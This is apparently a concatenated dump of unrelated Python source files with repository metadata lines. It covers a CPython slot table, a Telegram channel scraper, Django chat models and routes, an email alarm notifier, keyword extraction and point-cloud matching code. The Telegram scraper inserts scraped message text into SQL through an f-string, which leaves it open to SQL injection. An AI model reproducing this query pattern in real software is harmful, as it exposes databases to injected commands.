("bf_releasebuffer", "releasebufferproc"),
]
PyModuleDef = [
("m_name", "const char*"),
("m_doc", "const char*"),
("m_size", "Py_ssize_t"),
("m_methods", "PyMethodDef*"),
("m_reload", "inquiry"),
("m_traverse", "traverseproc"),
("m_clear", "inquiry"),
("m_free", "freefunc"),
]
SEQUENCE_FUNCS = [
("__len__", "sq_length"),
("__???__", "sq_concat"),
("__???__", "sq_repeat"),
("__getitem__", "sq_item"),
("__???___", "was_sq_slice"),
("__setitem__", "sq_ass_item"),
("__???___", "was_sq_ass_slice"),
("__contains__", "sq_contains"),
("__???___", "sq_inplace_concat"),
("__???___", "sq_inplace_repeat"),
]
NUMBER_FUNCS = [
("__add__", "nb_add", "binaryfunc"),
("__sub__", "nb_subtract", "binaryfunc"),
("__mul__", "nb_multiply", "binaryfunc"),
("__mod__", "nb_remainder", "binaryfunc"),
("__???__", "nb_divmod", "binaryfunc"),
("__pow__", "nb_power", "ternaryfunc"),
("__neg__", "nb_negative", "unaryfunc"),
("__pos__", "nb_positive", "unaryfunc"),
("__abs__", "nb_absolute", "unaryfunc"),
("__bool__", "nb_bool", "inquiry"),
("__???__", "nb_invert", "unaryfunc"),
("__???__", "nb_lshift", "binaryfunc"),
("__???__", "nb_rshift", "binaryfunc"),
("__and__", "nb_and", "binaryfunc"),
("__xor__", "nb_xor", "binaryfunc"),
("__or__", "nb_or", "binaryfunc"),
("__???__", "nb_int", "unaryfunc"),
("__???__", "nb_reserved", "void*"),
("__???__", "nb_float", "unaryfunc"),
("__iadd__", "nb_inplace_add", "binaryfunc"),
("__isub__", "nb_inplace_subtract", "binaryfunc"),
("__imul__", "nb_inplace_multiply", "binaryfunc"),
("__imod__", "nb_inplace_remainder", "binaryfunc"),
("__ipow__", "nb_inplace_power", "ternaryfunc"),
("__???__", "nb_inplace_lshift", "binaryfunc"),
("__???__", "nb_inplace_rshift", "binaryfunc"),
("__iand__", "nb_inplace_and", "binaryfunc"),
("__ixor__", "nb_inplace_xor", "binaryfunc"),
("__ior__", "nb_inplace_or", "binaryfunc"),
("__floordiv__", "nb_floor_divide", "binaryfunc"),
("__truediv__", "nb_true_divide", "binaryfunc"),
("__ifloordiv__", "nb_inplace_floor_divide", "binaryfunc"),
("__itruediv__", "nb_inplace_true_divide", "binaryfunc"),
("__???__", "nb_index", "unaryfunc"),
]
TYPE_FUNCS = [
("__str__", "tp_str"),
("__unicode__", "tp_str"),
("__repr__", "tp_repr"),
("__init__", "tp_init"),
("__eq__", "tp_richcompare")
]
# otherwise PyObject*
SPECIAL_RETURN_TYPES = {
"__init__": "int",
"__len__": "Py_ssize_t",
"__setitem__": "int",
}
SPECIAL_ARGUMENTS = {
"__getitem__": ", Py_ssize_t index",
"__setitem__": ", Py_ssize_t index, PyObject* arg",
}
FUNCNAME_TO_STRUCT_MEMBER = dict()
for i in SEQUENCE_FUNCS + NUMBER_FUNCS + TYPE_FUNCS:
FUNCNAME_TO_STRUCT_MEMBER.setdefault(i[0], i[1])
STRUCT_MEMBER_TO_TYPE = dict()
for i in PyModuleDef + PyBufferProcs + PyMappingMethods + PySequenceMethods + PyNumberMethods + PyTypeObject:
STRUCT_MEMBER_TO_TYPE.setdefault(i[0], i[1])
FUNCNAME_TO_TYPE = dict()
for i in FUNCNAME_TO_STRUCT_MEMBER:
mem = FUNCNAME_TO_STRUCT_MEMBER.get(i)
if mem in STRUCT_MEMBER_TO_TYPE:
FUNCNAME_TO_TYPE.setdefault(i, STRUCT_MEMBER_TO_TYPE[mem]) | 3.046875 | 3 |
AlphabetPy/__init__.py | RayZhao1998/alphabetPy | 6 | 12766398 | from .alphabet import start, getAlphabet
if __name__ == '__main__':
start()
getAlphabet() | 0.917969 | 1 |
posts/news_grabber.py | Shubarin/alice_news_skill | 0 | 12766399 | # coding=utf-8
import configparser
import datetime as dt
import json
import sqlite3
import os
from telethon.sync import TelegramClient
from telethon import connection
# для корректного переноса времени сообщений в json
from datetime import date, datetime
# классы для работы с каналами
from telethon.tl.functions.channels import GetParticipantsRequest
from telethon.tl.types import ChannelParticipantsSearch
# класс для работы с сообщениями
from telethon.tl.functions.messages import GetHistoryRequest
# Считываем учетные данные
config = configparser.ConfigParser()
config.read("config.ini")
# Присваиваем значения внутренним переменным
api_id = config['Telegram']['api_id']
api_hash = config['Telegram']['api_hash']
username = config['Telegram']['username']
client = TelegramClient(username, api_id, api_hash)
client.start()
async def dump_all_messages(channel):
"""Записывает json-файл с информацией о всех сообщениях канала/чата"""
offset_msg = 0 # номер записи, с которой начинается считывание
limit_msg = 100 # максимальное число записей, передаваемых за один раз
all_messages = [] # список всех сообщений
total_messages = 0
total_count_limit = 100 # количество сообщений, которые нужно получить
class DateTimeEncoder(json.JSONEncoder):
'''Класс для сериализации записи дат в JSON'''
def default(self, o):
if isinstance(o, datetime):
return o.isoformat()
if isinstance(o, bytes):
return list(o)
return json.JSONEncoder.default(self, o)
while True:
history = await client(GetHistoryRequest(
peer=channel,
offset_id=offset_msg,
offset_date=None, add_offset=0,
limit=limit_msg, max_id=0, min_id=0,
hash=0))
if not history.messages:
break
messages = history.messages
for message in messages:
all_messages.append(message.to_dict())
offset_msg = messages[len(messages) - 1].id
total_messages = len(all_messages)
if total_count_limit != 0 and total_messages >= total_count_limit:
break
db_name = 'db.sqlite'
con = sqlite3.connect(db_name)
cur = con.cursor()
for line in all_messages:
try:
id = line['id']
message = line['message']
if not message:
continue
pub_date = line['date'].strftime("%Y-%m-%d %I:%M:%S")
cur.execute("INSERT INTO news(id,message,pub_date) "
f"VALUES({id}, '{message}', '{pub_date}')")
except sqlite3.IntegrityError:
break
except:
continue
con.commit()
con.close()
async def main():
url = "https://t.me/QryaProDucktion"
channel = await client.get_entity(url)
await dump_all_messages(channel)
with client:
client.loop.run_until_complete(main()) | 2.421875 | 2 |
pandemic/chat/models.py | RubenBranco/Pandemic | 1 | 12766400 | <gh_stars>1-10
from django.db import models
from django.contrib.auth.models import User
from game.models import Session
import uuid
class Chat(models.Model):
session = models.ForeignKey(Session, on_delete=models.CASCADE)
def __str__(self):
return f"session={self.session!s}"
class Message(models.Model):
chat = models.ForeignKey(Chat, on_delete=models.CASCADE)
sender = models.ForeignKey(User, related_name="user_message", on_delete=models.CASCADE)
text = models.CharField(max_length=512)
date_time = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"[{self.date_time}] {self.sender.username}: {self.text}"
| 2.34375 | 2 |
election/__init__.py | ideascf/octopus | 6 | 12766401 | # coding=utf-8
from .election import Election
| 1.078125 | 1 |
src/quocspyside2interface/logic/HandleExitBasic.py | Quantum-OCS/QuOCS-pyside2interface | 1 | 12766402 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import logging
from qtpy import QtCore
class HandleExitBasic(QtCore.QObject):
"""This class check and update the current optimization status and notify the Client Interface and the Optimization
code about it"""
logger = logging.getLogger("oc_logger")
is_user_running: bool
@QtCore.Slot(bool)
def set_is_user_running(self, is_running: bool):
"""
Module connected with the Client Interface GUI. Stop the communication when the user presses to the Stop button
:param bool is_running:
:return:
"""
self.is_user_running = is_running
def check_communication(self, communication: dict) -> bool:
"""
Update the Client Interface and Optimization Code numbers and return the running status
:param dict communication:
:return: bool : True if it is still running, False stopped by the interface or the optimization code
"""
if not self.is_user_running:
return False
# Check the communication dictionary
server_number = communication["server_number"]
if server_number == -1 or server_number == 4:
self.logger.info("End of communications")
return False
else:
return True
def get_terminate_reason(self) -> str:
"""
Get the ending reason
:return: str : terminate reason
"""
print("Something to write here")
return "No idea"
| 2.015625 | 2 |
models/tree_utils.py | kchro/plato | 2 | 12766403 | import re
import spacy
import torch
class Tree:
def __init__(self, val=None, formula=None):
if val:
self.val = val
self.children = []
if formula:
root = self.parse(formula)
self.val = root.val
self.children = root.children
def parse(self, formula):
m = re.search('(.*?)\\((.*)\\)', formula)
if m:
# NOTE: this was a huge fuckup
# if m.group(1) not in '&|$~':
# return Tree(val=m.group(0))
root = Tree(val=m.group(1))
subformula = m.group(2)
splits = []
paren_count = 0
start = 0
for end in range(len(subformula)):
if subformula[end] == '(':
paren_count += 1
elif subformula[end] == ')':
paren_count -= 1
elif paren_count == 0:
if subformula[end] == ',':
splits.append(subformula[start:end])
start = end + 1
splits.append(subformula[start:end + 1])
root.children = [ self.parse(sub) for sub in splits ]
return root
return Tree(val=formula)
def flatten(self):
"""
flatten a tree into string
"""
if len(self.children) == 0:
return self.val
params = (',').join([ child.flatten() for child in self.children ])
return '%s(%s)' % (self.val, params)
def inorder(self):
"""
generate the sequence inorder (include the non-terminals)
"""
if len(self.children) == 0:
return ['%s' % self.val]
params = (' , ').join([' <N> '] * len(self.children))
inorder = ['%s ( %s ) ' % (self.val, params)]
for child in self.children:
inorder += child.inorder()
return inorder
def __str__(self):
"""
print a tree in hierarchical structure
"""
if len(self.children) == 0:
return self.val
ret = [
self.val]
for child in self.children:
ret += [ '\t' + child_s for child_s in str(child).split('\n') ]
return ('\n').join(ret)
nlp = spacy.load('en')
class DepTree:
def __init__(self, sent=None, node=None, src_vocab=None, device='cpu'):
self.device = device
self.src_vocab = src_vocab
if sent:
doc = nlp(unicode(sent))
node = self.get_root(doc)
if node:
self.val = node.text.lower()
if self.val not in self.src_vocab.vocab:
self.val = '<UNK>'
self.idx = src_vocab.word_to_index[self.val]
self.input = torch.tensor(self.idx,
dtype=torch.long,
device=self.device)
self.children = []
for child in node.children:
self.children.append(DepTree(node=child,
src_vocab=src_vocab,
device=self.device))
def get_root(self, doc):
for token in doc:
if token.dep_ == 'ROOT':
return token
raise
| 2.796875 | 3 |
alarm_central_station_receiver/notifications/notifiers/emailer.py | alexp789/alarm-central-station-receiver | 25 | 12766404 | """
Copyright (2017) <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from alarm_central_station_receiver.config import AlarmConfig
def create_message(events):
"""
Build the message body. The first event's timestamp is included
in the message body as well. When sending this email to an SMS bridge,
sometimes the time that the SMS is received is well after the event occurred
and there is no clear way to know when the message was actually sent.
"""
messages = []
timestamp = ''
for event in events:
rtype = event.get('type')
desc = event.get('description')
if not timestamp:
timestamp = event.get('timestamp')
messages.append('%s: %s' % (rtype, desc))
return '%s:\n%s' % (timestamp, '\n'.join(messages))
def notify(events):
if not events:
return
if 'EmailNotification' not in AlarmConfig.config:
return
logging.info("Sending email...")
username = AlarmConfig.config.get('EmailNotification', 'username')
password = AlarmConfig.config.get('EmailNotification', 'password')
to_addr = AlarmConfig.config.get('EmailNotification', 'notification_email')
subject = AlarmConfig.config.get('EmailNotification', 'notification_subject')
tls = AlarmConfig.config.getboolean('EmailNotification', 'tls')
server = AlarmConfig.config.get('EmailNotification', 'server_address')
server_port = AlarmConfig.config.get('EmailNotification', 'port')
msg = MIMEMultipart('alternative')
msg['From'] = username
msg['To'] = to_addr
msg['Subject'] = subject
body = create_message(events)
msg.attach(MIMEText(body, 'plain'))
msg.attach(MIMEText(body, 'html'))
try:
s = smtplib.SMTP(server, server_port)
s.ehlo()
if tls:
s.starttls()
s.ehlo()
s.login(username, password)
s.sendmail(username, [to_addr], msg.as_string())
s.quit()
logging.info("Email send complete")
except smtplib.SMTPException as exc:
logging.error("Error sending email: %s", str(exc))
| 2.0625 | 2 |
day10/day10program2.py | ninjaoxygen/AdventOfCode2017Python | 0 | 12766405 | <filename>day10/day10program2.py
#!/usr/bin/python
import csv
import operator
elements = []
current = 0
skip = 0
def processLine(line, length):
global elements
global current
global skip
#print("first", elements)
# process each entry in the swap list
for i in range(0, len(line)):
swapCount = line[i]
for j in range(0, int(swapCount / 2)):
i1 = (current + j) % length
i2 = (current + swapCount - j - 1) % length
#print("swapping ", i1, elements[i1], "with", i2, elements[i2])
temp = elements[i1]
elements[i1] = elements[i2]
elements[i2] = temp
#print("after swap", elements)
current = (current + swapCount + skip) % length
skip += 1
#print("current is now", current)
# get the check by multiplying first two numbers
print("checksum", elements[0] * elements[1])
def readFile(filename):
with open(filename) as f:
return f.readline()
def checkFile(filename, length):
for i in range(0, length):
elements.append(i)
# grab the list from the file
line = readFile(filename)
line = line[0:len(line) - 1]
data = []
#print(line)
# convert to integers
for i in range(0, len(line)):
data.append(ord(line[i]))
data.append(17)
data.append(31)
data.append(73)
data.append(47)
data.append(23)
#print(data)
# 64 iterations of the mixer
for i in range(0, 64):
processLine(data, length)
# calculate dense hash
dense = []
current = 0
for j in range(0, 16):
# compress one block of 16 values
xorSum = 0
for i in range(0, 16):
xorSum ^= elements[current]
current += 1
dense.append(xorSum)
strHex = ""
for j in range(0, 16):
strHex += "%0.2x" % dense[j]
print(strHex)
checkFile("input.txt", 256)
| 3.765625 | 4 |
bioimageit_core/runners/service_allgo.py | bioimageit/bioimageit_core | 2 | 12766406 | # -*- coding: utf-8 -*-
"""bioimageit_core Allgo process service.
This module implements a service to run a process
using the AllGo client API (allgo18.inria.fr).
Classes
-------
ProcessServiceProvider
"""
import os
import ntpath
import allgo as ag
from bioimageit_core.config import ConfigAccess
from bioimageit_core.core.utils import Observable
from bioimageit_core.processes.containers import ProcessContainer
class AllgoRunnerServiceBuilder:
"""Service builder for the runner service"""
def __init__(self):
self._instance = None
def __call__(self, **_ignored):
if not self._instance:
self._instance = AllgoRunnerService()
return self._instance
class AllgoRunnerService(Observable):
"""Service for runner exec using AllGo client API"""
def __init__(self):
super().__init__()
self.service_name = 'AllgoRunnerService'
def set_up(self, process: ProcessContainer):
"""setup the runner
Add here the code to initialize the runner
Parameters
----------
process
Metadata of the process
"""
pass
def exec(self, process: ProcessContainer, args):
"""Execute a process
Parameters
----------
process
Metadata of the process
args
list of arguments
"""
token = None
config = ConfigAccess.instance().config['runner']
if 'token' in config:
token = config['token']
client = ag.Client(token)
# exec the process
params = ' '.join(args[1:])
files = []
for input_ in process.inputs:
if input_.is_data:
filename = ntpath.basename(input_.value)
params = params.replace(input_.value, filename)
files.append(input_.value)
for output in process.outputs:
if output.is_data:
filename = ntpath.basename(output.value)
params = params.replace(output.value, filename)
# print('files:', files)
# print('params:', params)
try:
out_dict = client.run_job(process.id, files=files, params=params)
except ag.StatusError as e:
print('API status Error:', e.status_code)
print('API status Error:', e.msg)
# print(out_dict)
# get the outputs
job_id = out_dict['id']
for output in process.outputs:
output_filename = ntpath.basename(output.value)
output_dir = os.path.dirname(os.path.abspath(output.value))
url = out_dict[str(job_id)][output_filename]
filepath = client.download_file(file_url=url, outdir=output_dir,
force=True)
# print('out file downloaded at :', filepath)
def tear_down(self, process: ProcessContainer):
"""tear down the runner
Add here the code to down/clean the runner
Parameters
----------
process
Metadata of the process
"""
pass
| 2.328125 | 2 |
apps/social/urls.py | louis-pre/NewsBlur | 0 | 12766407 | <gh_stars>0
from django.conf.urls import url
from apps.social import views
urlpatterns = [
url(r'^river_stories/?$', views.load_river_blurblog, name='social-river-blurblog'),
url(r'^share_story/?$', views.mark_story_as_shared, name='mark-story-as-shared'),
url(r'^unshare_story/?$', views.mark_story_as_unshared, name='mark-story-as-unshared'),
url(r'^load_user_friends/?$', views.load_user_friends, name='load-user-friends'),
url(r'^load_follow_requests/?$', views.load_follow_requests, name='load-follow-requests'),
url(r'^profile/?$', views.profile, name='profile'),
url(r'^load_user_profile/?$', views.load_user_profile, name='load-user-profile'),
url(r'^save_user_profile/?$', views.save_user_profile, name='save-user-profile'),
url(r'^upload_avatar/?', views.upload_avatar, name='upload-avatar'),
url(r'^save_blurblog_settings/?$', views.save_blurblog_settings, name='save-blurblog-settings'),
url(r'^interactions/?$', views.load_interactions, name='social-interactions'),
url(r'^activities/?$', views.load_activities, name='social-activities'),
url(r'^follow/?$', views.follow, name='social-follow'),
url(r'^unfollow/?$', views.unfollow, name='social-unfollow'),
url(r'^approve_follower/?$', views.approve_follower, name='social-approve-follower'),
url(r'^ignore_follower/?$', views.ignore_follower, name='social-ignore-follower'),
url(r'^feed_trainer', views.social_feed_trainer, name='social-feed-trainer'),
url(r'^public_comments/?$', views.story_public_comments, name='story-public-comments'),
url(r'^save_comment_reply/?$', views.save_comment_reply, name='social-save-comment-reply'),
url(r'^remove_comment_reply/?$', views.remove_comment_reply, name='social-remove-comment-reply'),
url(r'^find_friends/?$', views.find_friends, name='social-find-friends'),
url(r'^like_comment/?$', views.like_comment, name='social-like-comment'),
url(r'^remove_like_comment/?$', views.remove_like_comment, name='social-remove-like-comment'),
# url(r'^like_reply/?$', views.like_reply, name='social-like-reply'),
# url(r'^remove_like_reply/?$', views.remove_like_reply, name='social-remove-like-reply'),
url(r'^comment/(?P<comment_id>\w+)/reply/(?P<reply_id>\w+)/?$', views.comment_reply, name='social-comment-reply'),
url(r'^comment/(?P<comment_id>\w+)/?$', views.comment, name='social-comment'),
url(r'^rss/(?P<user_id>\d+)/?$', views.shared_stories_rss_feed, name='shared-stories-rss-feed'),
url(r'^rss/(?P<user_id>\d+)/(?P<username>[-\w]+)?$', views.shared_stories_rss_feed, name='shared-stories-rss-feed'),
url(r'^stories/(?P<user_id>\w+)/(?P<username>[-\w]+)?/?$', views.load_social_stories, name='load-social-stories'),
url(r'^page/(?P<user_id>\w+)/(?P<username>[-\w]+)?/?$', views.load_social_page, name='load-social-page'),
url(r'^settings/(?P<social_user_id>\w+)/(?P<username>[-\w]+)?/?$', views.load_social_settings, name='load-social-settings'),
url(r'^statistics/(?P<social_user_id>\w+)/(?P<username>[-\w]+)/?$', views.load_social_statistics, name='load-social-statistics'),
url(r'^statistics/(?P<social_user_id>\w+)/?$', views.load_social_statistics, name='load-social-statistics'),
url(r'^mute_story/(?P<secret_token>\w+)/(?P<shared_story_id>\w+)?$', views.mute_story, name='social-mute-story'),
url(r'^(?P<username>[-\w]+)/?$', views.shared_stories_public, name='shared-stories-public'),
]
| 1.679688 | 2 |
concept_extractor/extractor.py | fossabot/grafit | 0 | 12766408 | <reponame>fossabot/grafit
import abc
import csv
from textblob import TextBlob as tb
import math
from pkg_resources import resource_string
class ExtractStrategyAbstract(object):
"""Abstract strategy class for the extract method."""
__metaclass__ = abc.ABCMeta # define as absctract class
@abc.abstractmethod
def extract_keyphrases(self, text: str):
"""Required Method"""
class FakeExtractStrategy(ExtractStrategyAbstract):
def extract_keyphrases(self, text: str):
return ["test"]
class TextblobTfIdfExtractStrategy(ExtractStrategyAbstract):
def __init__(self):
self.corpus = self.load_corpus()
def tf(self, word, blob):
return blob.words.count(word) / len(blob.words)
def n_containing(self, word, corpus):
return sum(1 for blob in corpus if word in blob.words)
def idf(self, word, corpus):
return math.log(len(corpus) / (1 + self.n_containing(word, corpus)))
def tfidf(self, word, blob, corpus):
return self.tf(word, blob) * self.idf(word, corpus)
def load_corpus(self):
raw_csv = resource_string(
'resources', 'grafit_public_article.csv').decode('utf-8').splitlines()
results = list(csv.reader(raw_csv, delimiter=','))
tbs = []
for result in results:
tbs.append(tb(result[1] + " " + result[2]))
return tbs
def extract_keyphrases(self, text: str, top_n_words=5):
result = []
blob = tb(text)
scores = {word: self.tfidf(word, blob, self.corpus)
for word in blob.words}
sorted_words = sorted(scores.items(), key=lambda x: x[1], reverse=True)
for word, score in sorted_words[:top_n_words]:
result.append({
"word": word,
"tf-idf": score
})
return result
def main():
keyword_extractor = TextblobTfIdfExtractStrategy()
print(keyword_extractor.extract_keyphrases("Vulkan Vulkan Vulkan Ollagüe (Spanish pronunciation: [oˈʝaɣwe]) or Ullawi (Aymara pronunciation: [uˈʎawi]) is a massive andesite stratovolcano in the Andes on the border between Bolivia and Chile, within the Antofagasta Region of Chile and the Potosi Department of Bolivia. Part of the Central Volcanic Zone of the Andes, its highest summit is 5,868 metres (19,252 ft) above sea level and features a summit crater that opens to the south. The western rim of the summit crater is formed by a compound of lava domes, the youngest of which features a vigorous fumarole that is visible from afar."))
if __name__ == '__main__':
main()
| 2.765625 | 3 |
steadymark/runner.py | gabrielfalcao/steadymark | 6 | 12766409 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# <steadymark - markdown-based test runner for python>
# Copyright (C) <2012-2020> <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import os
import sys
import traceback
import codecs
try:
from couleur import SUPPORTS_ANSI
except ImportError:
SUPPORTS_ANSI = False
from steadymark.core import SteadyMark, DocTestFailure
def extract_example(exc, attribute_name):
example = getattr(exc, "example", None)
if not example:
return
return getattr(exc, attribute_name, None)
class Runner(object):
def __init__(self, filename=None, text=""):
if filename and not os.path.exists(filename):
print(("steadymark could not find {0}".format(filename)))
sys.exit(1)
if filename:
raw_md = codecs.open(filename, "rb", "utf-8").read()
text = str(raw_md)
self.steadymark = SteadyMark.inspect(text)
self.filename = filename
self.text = text
def print_white(self, text, indentation=0):
white = {True: "\033[1;37m", False: ""}
for line in text.splitlines():
print(
(
"{1}{2}{0}\033[0m".format(
line, " " * indentation, white[SUPPORTS_ANSI]
)
)
)
def __getattr__(self, attr):
if attr not in ("print_white", "print_green", "print_red", "print_yellow"):
return super(Runner, self).__getattribute__(attr)
color_for = {
"print_white": "\033[1;37m",
"print_red": "\033[1;31m",
"print_green": "\033[1;32m",
"print_yellow": "\033[1;33m",
}
ansi = color_for[attr]
if SUPPORTS_ANSI:
color = ansi
no_color = "\033[0m"
else:
no_color = color = ""
def printer(text, indentation=0):
for line in text.splitlines():
print(("{1}{2}{0}{3}".format(line, " " * indentation, color, no_color)))
return printer
def format_ms(self, ms):
ms = int(ms)
base = "{0}ms".format(ms)
if SUPPORTS_ANSI:
return "\033[1;33m{0}\033[0m".format(base)
else:
return base
def format_traceback(self, test, failure):
exc, exc_instance, tb = failure
# formatted_tb = traceback.format_exc(exc_instance).strip()
# if 'None' == formatted_tb:
formatted_tb = "".join(traceback.format_tb(tb))
formatted_tb = formatted_tb.replace(
'File "{0}"'.format(test.title), 'In the test "{0}"'.format(test.title)
)
formatted_tb = formatted_tb.replace("@STEADYMARK@", str(test.title))
if SUPPORTS_ANSI:
color = "\033[1;36m"
else:
color = ""
return "{0} {3}{1}\n{2}\n".format(
exc.__name__, exc_instance, formatted_tb, color
)
def report_success(self, test, shift, ms):
self.print_green("\u2714 {0}".format(ms))
print()
def report_failure(self, test, failure, shift, ms):
self.print_red("\u2718 {0}".format(ms))
exc_type, exc_val, exc_tb = failure
if exc_type is DocTestFailure:
formatted_tb = "the line {0}: {1}\n".format(
extract_example(exc_val, "lineno"), extract_example(exc_val, "source")
)
if extract_example(exc_val, "exc_msg"):
formatted_tb += "{0}\n".format(extract_example(exc_val, "exc_msg"))
else:
formatted_tb += "resulted in:\n{0}\n" "when expecting:\n{1}\n".format(
exc_val.got, extract_example(exc_val, "want")
)
else:
formatted_tb = self.format_traceback(test, failure)
self.print_red(formatted_tb, indentation=2)
header = "original code:"
header_length = len(header)
self.print_white("*" * header_length)
self.print_white(header)
self.print_white("*" * header_length)
for number, line in enumerate(test.raw_code.splitlines(), start=1):
if line == extract_example(exc_val, "lineno"):
self.print_red("{0}: {1}".format(number, line), indentation=2)
else:
self.print_yellow("{0}: {1}".format(number, line), indentation=2)
print()
def report_test_result(self, test, failure, before, after):
shift = before - after
ms = self.format_ms(shift.microseconds / 1000)
if not failure:
return self.report_success(test, shift, ms)
return self.report_failure(test, failure, shift, ms)
def run(self):
if self.filename:
print(("Running tests from {0}".format(self.filename)))
exit_status = 0
for test in self.steadymark.tests:
title = "{0} ".format(test.title)
title_length = len(title)
print(("." * title_length))
sys.stdout.write(title)
result, failure, before, after = test.run()
if failure:
exit_status = 1
self.report_test_result(test, failure, before, after)
if exit_status != 0:
sys.exit(exit_status)
return self.steadymark
| 2.140625 | 2 |
surface_matching.py | minhncedutw/record_segment_match_grasp | 0 | 12766410 | <reponame>minhncedutw/record_segment_match_grasp
'''
File name: HANDBOOK
Author: minhnc
Date created(MM/DD/YYYY): 12/10/2018
Last modified(MM/DD/YYYY HH:MM): 12/10/2018 9:45 AM
Python Version: 3.6
Other modules: [None]
Copyright = Copyright (C) 2017 of <NAME>
Credits = [None] # people who reported bug fixes, made suggestions, etc. but did not actually write the code
License = None
Version = 0.9.0.1
Maintainer = [None]
Email = <EMAIL>
Status = Prototype # "Prototype", "Development", or "Production"
Code Style: http://web.archive.org/web/20111010053227/http://jaynes.colorado.edu/PythonGuidelines.html#module_formatting
'''
#==============================================================================
# Imported Modules
#==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os.path
import sys
import time
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0" # The GPU id to use, usually either "0" or "1"
#==============================================================================
# Constant Definitions
#==============================================================================
#==============================================================================
# Function Definitions
#==============================================================================
# [Source](https://www.learnopencv.com/rotation-matrix-to-euler-angles/)
import math
# Checks if a matrix is a valid rotation matrix.
def isRotationMatrix(R):
Rt = np.transpose(R)
shouldBeIdentity = np.dot(Rt, R)
I = np.identity(3, dtype=R.dtype)
n = np.linalg.norm(I - shouldBeIdentity)
return n < 1e-6
# Calculates rotation matrix to euler angles
# The result is the same as MATLAB except the order
# of the euler angles ( x and z are swapped ).
def rotationMatrixToEulerAngles(R):
assert (isRotationMatrix(R))
sy = math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])
singular = sy < 1e-6
if not singular:
x = math.atan2(R[2, 1], R[2, 2])
y = math.atan2(-R[2, 0], sy)
z = math.atan2(R[1, 0], R[0, 0])
else:
x = math.atan2(-R[1, 2], R[1, 1])
y = math.atan2(-R[2, 0], sy)
z = 0
return np.array([x, y, z])
import open3d as op3
from open3d import *
import copy
def preprocess_point_cloud(pcd, voxel_size):
print(":: Downsample with a voxel size %.3f." % voxel_size)
pcd_down = op3.voxel_down_sample(pcd, voxel_size)
radius_normal = voxel_size * 2
print(":: Estimate normal with search radius %.3f." % radius_normal)
op3.estimate_normals(pcd_down, op3.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))
radius_feature = voxel_size * 5
print(":: Compute FPFH feature with search radius %.3f." % radius_feature)
pcd_fpfh = op3.compute_fpfh_feature(pcd_down, op3.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))
return pcd_down, pcd_fpfh
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
# source_temp.paint_uniform_color([1, 0.706, 0])
# target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.paint_uniform_color([1, 0, 0])
target_temp.paint_uniform_color([0, 0, 1])
source_temp.transform(transformation)
draw_geometries([source_temp, target_temp])
def execute_global_registration(source_down, target_down, source_fpfh, target_fpfh, voxel_size):
distance_threshold = voxel_size * 1.5
print(":: RANSAC registration on downsampled point clouds.")
print(" Since the downsampling voxel size is %.3f," % voxel_size)
print(" we use a liberal distance threshold %.3f." % distance_threshold)
result = op3.registration_ransac_based_on_feature_matching(
source_down, target_down, source_fpfh, target_fpfh,
distance_threshold,
op3.TransformationEstimationPointToPoint(False), 4,
[op3.CorrespondenceCheckerBasedOnEdgeLength(0.9),
op3.CorrespondenceCheckerBasedOnDistance(distance_threshold)],
op3.RANSACConvergenceCriteria(4000000, 500)
# op3.RANSACConvergenceCriteria(10000000, 20000)
)
return result
def refine_registration(source, target, voxel_size, gross_matching):
distance_threshold = voxel_size * 0.4
print(":: Point-to-plane ICP registration is applied on original point")
print(" clouds to refine the alignment. This time we use a strict")
print(" distance threshold %.3f." % distance_threshold)
result = op3.registration_icp(source, target, distance_threshold,
gross_matching.transformation,
op3.TransformationEstimationPointToPlane(),
op3.ICPConvergenceCriteria(max_iteration=2000))
return result
#==============================================================================
# Main function
#==============================================================================
def main(argv=None):
print('Hello! This is XXXXXX Program')
if argv is None:
argv = sys.argv
if len(argv) > 1:
for i in range(len(argv) - 1):
print(argv[i + 1])
if __name__ == '__main__':
main()
| 1.578125 | 2 |
